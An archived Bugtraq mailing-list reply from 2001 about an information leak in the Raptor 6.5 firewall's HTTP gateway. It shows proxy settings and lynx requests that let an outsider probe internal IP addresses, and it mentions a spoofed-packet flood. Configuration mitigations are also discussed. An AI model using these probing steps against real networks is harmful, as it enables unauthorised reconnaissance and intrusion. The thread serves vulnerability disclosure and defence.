Bugtraq mailing list archives

Re: Raptor 6.5 http vulnerability

From: Alexander Bochmann <ab () GXIS DE>
Date: Tue, 27 Mar 2001 00:26:32 +0200

Hi,

...on Mon, Mar 26, 2001 at 10:34:30PM +0200, Lysel Christian Emre wrote:

I already noticed some months ago that the Raptor (6.0.2)
firewall's http gateway possibly leaks information about an
internal network with the method you described, if redirected

It does not leaks information about the internal network. The apache
webserver can leak information from error pages:


It does, because by trial-and-error, you can find out about
IP addresses used on an internal interface with connections
from an outside interface, with basically the same method
as you described it, and by just monitoring the answers returned
by the firewall.

(On another note, at least with 6.5, if spoofing protection
isn't activated and configured correctly on the internal
interfaces, you can also flood the internal network with
packets generated by the firewall as answer to (spoofed)
packets on the outside interface - if you know the networks
used internally.)

It's possible to brute-force IP addresses used on a DMZ
network: If you use the http gateway on the external
interface as proxy, you can access internal IPs (and
internal DNS names) directly - just try them all ;)

This should generate some logs!


As always, there has to be someone watching them.

And can also be blocked by: http.urlpattern

Example:

setenv http_proxy http://external.firewall.name:80/

Now go on with something like...

lynx -mime_header http://192.168.95.2:80/

HTTP/1.1 503 Service Unavailable
Server: Simple, Secure Web Server 1.1
[.. etc ..]

This is the internal interface for the firewall, right?


Right, but as I said, this request can be sent from the
outside interface.
You can also use internal DNS names from an outside interface
when addressing the http gateway as proxy, but I think these
are usually more difficult to find out, unless you have
an additional information source.

...or, if you are lucky, an answer from a web server:
% lynx -mime_header http://192.168.95.74:80/

And this is a request to the webserver?


Yes, located on an internal network.

http.remove-header, should remove the headers :)


I didn't know that one... But I don't think it would
help, as an IP address with a working web server on
it will usually return an answer that doesn't look like
the error page of the http gateway on the Raptor, which
will be indication enough you have found a valid
internal IP, and can go on from there.

Alex.

Current thread:

Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
  - Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
  - Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
    - Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)